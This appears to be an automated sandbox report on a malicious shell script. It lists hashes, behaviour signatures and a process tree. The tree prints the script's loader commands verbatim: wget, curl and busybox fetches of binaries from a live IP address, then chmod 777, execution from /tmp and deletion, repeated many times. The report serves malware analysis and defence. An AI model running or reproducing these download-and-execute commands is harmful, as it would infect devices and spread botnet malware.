Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:23
Static task
static1
Behavioral task
behavioral1
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
-
Size
10KB
-
MD5
6c8b51991fdf61d5e4d608d79172aadd
-
SHA1
10016e44064fd77256e054fe97e269bf6b46fc5e
-
SHA256
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335
-
SHA512
3db47a0dc66e9e868e1048b5fe9d76623218d7b22e383a0fe08a6aa839e389312ead6a4f05da171606cfb61b1898bede08be48c1fa45548d78071e0d95d8edb2
-
SSDEEP
192:QFJGhYwT11BGFV2uRjPe7jbP8lglFJGhYw91BGFV+jPe7jvee:4oTuYP8GvNN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 895 chmod 907 chmod 913 chmod 937 chmod 961 chmod 808 chmod 883 chmod 901 chmod 919 chmod 931 chmod 973 chmod 865 chmod 857 chmod 830 chmod 739 chmod 766 chmod 732 chmod 871 chmod 889 chmod 814 chmod 925 chmod 788 chmod 949 chmod 745 chmod 943 chmod 955 chmod 967 chmod 877 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 733 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 740 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 746 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 768 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 789 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 809 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 815 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 831 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 858 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 866 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 872 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 878 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 884 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 890 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 896 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 902 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 908 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 914 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 920 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 926 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 932 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 938 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 944 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 950 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 956 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 962 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 968 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 974 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl
Processes
-
/tmp/39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh/tmp/39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh1⤵PID:702
-
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:730
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:733
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:734
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:738
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:744
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:756
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:784
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:792
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:794
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:807
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:808
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:809
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:810
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:811
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:813
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:827
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:836
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:853
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:864
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:870
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:876
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:882
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:888
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:894
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:900
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:906
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:912
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:918
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:924
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:930
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:934
-
-
